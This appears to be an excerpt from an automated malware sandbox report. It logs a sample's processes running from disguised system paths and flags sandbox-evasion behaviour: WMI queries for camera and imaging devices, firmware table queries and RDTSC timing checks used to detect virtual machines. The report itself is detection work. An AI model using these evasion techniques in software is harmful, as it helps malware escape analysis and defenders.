                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    barindex
                                    Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Query firmware table information (likely to detect VMs)
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeSystem information queried: FirmwareTableInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeSystem information queried: FirmwareTableInformationJump to behavior
                                    Tries to evade analysis by execution special instruction (VM detection)
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeSpecial instruction interceptor: First address: 14076D2EF instructions rdtsc caused by: RDTSC with Trap Flag (TF)
